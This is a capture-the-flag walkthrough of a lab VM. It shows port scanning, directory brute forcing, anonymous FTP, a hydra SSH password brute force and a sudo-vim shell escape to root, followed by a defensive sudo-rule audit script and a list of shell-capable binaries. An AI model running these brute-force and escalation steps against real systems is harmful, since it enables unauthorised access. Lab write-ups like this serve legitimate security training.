Information gathering:
$ sudo nmap -sT -p- 192.168.150.133
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
7223/tcp open unknown
$ sudo nmap -sV -sT -sC -O -p21,80,7223 192.168.150.133 -o nmap_all.txt
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.150.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 1000 1000 47 Jun 18 2021 flag1.txt
|_-rw-r--r-- 1 1000 1000 849 Jun 19 2021 word.dir
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_*/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: hackathon2
7223/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 704aa969c2d1682386bd858331ca800c (RSA)
| 256 a69ea418ada42b7eeaf85e63296e4f24 (ECDSA)
|_ 256 4edba6d2ebb953a5d7210b4e57a5f5c1 (ED25519)
MAC Address: 00:0C:29:4C:E7:09 (VMware)
$ gobuster dir -u http://192.168.150.133 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip,txt,html
/.html (Status: 403) [Size: 280]
/index.html (Status: 200) [Size: 1254]
/robots.txt (Status: 200) [Size: 70]
/happy (Status: 200) [Size: 110]
$ curl -L http://192.168.150.133/happy
The page source contains an HTML comment with a username:
<!-- username: hackathonll >
FTP:
$ ftp 192.168.150.133
-rw-r--r-- 1 1000 1000 47 Jun 18 2021 flag1.txt
-rw-r--r-- 1 1000 1000 849 Jun 19 2021 word.dir
ftp>binary
ftp>get word.dir
This yields a wordlist.
SSH brute force:
$ hydra -l hackathonll -P ./word.dir 192.168.150.133 -s 7223 ssh -f -vV
[7223][ssh] host: 192.168.150.133 login: hackathonll password: Ti@gO
$ ssh hackathonll@192.168.150.133 -p 7223
Privilege escalation:
$ sudo -l
(root) NOPASSWD: /usr/bin/vim
$ sudo vim
:!/bin/bash
root@hackathon:/home/hackathonll#
# cat flag2.txt
₣Ⱡ₳₲{7e3c118631b68d159d9399bda66fc694}
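
The root shell above comes from a sudo rule that lets an interactive editor run as root. The following is an added example, not part of the original write-up: a small audit of `sudo -l` output that flags such rules. The SHELL_CAPABLE list and the sample rules other than the vim line are constructed for illustration.

```python
import os
import re

# Constructed, non-exhaustive sample of programs that can start a shell
# or run arbitrary commands from inside their own interface.
SHELL_CAPABLE = {"vim", "vi", "view", "nano", "less", "more", "man",
                 "awk", "find", "python3", "perl", "bash", "sh"}

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAG_RE = re.compile(r"^([A-Z_]+):\s*")


def audit_sudo_rules(sudo_l_output):
    """Return rules that give the user a path to a root shell."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header, Defaults and blank lines
        runas = {u.strip() for u in m.group("runas").split(":")[0].split(",")}
        if not runas & {"root", "ALL"}:
            continue  # rule does not run as root
        # Tags apply to every following command until overridden.
        state = {"NOPASSWD": False, "NOEXEC": False}
        for item in m.group("rest").split(","):
            item = item.strip()
            while (t := TAG_RE.match(item)):
                tag = t.group(1)
                if tag in state:
                    state[tag] = True
                elif tag in ("PASSWD", "EXEC"):
                    state["NO" + tag] = False
                item = item[t.end():]
            if not item:
                continue
            binary = os.path.basename(item.split()[0])
            # A fixed file argument does not prevent a shell escape.
            if item == "ALL" or binary in SHELL_CAPABLE:
                findings.append({"command": item,
                                 "nopasswd": state["NOPASSWD"],
                                 "noexec": state["NOEXEC"]})
    return findings


# Constructed sample; only the first rule appears in the write-up.
SAMPLE = """User hackathonll may run the following commands on hackathon:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/sbin/reboot, NOPASSWD: /usr/bin/less /var/log/syslog
    (www-data) NOPASSWD: /usr/bin/vim
"""
```

Where a user only needs to edit specific root-owned files, a `sudoedit` rule for those files runs the editor as the invoking user instead of as root.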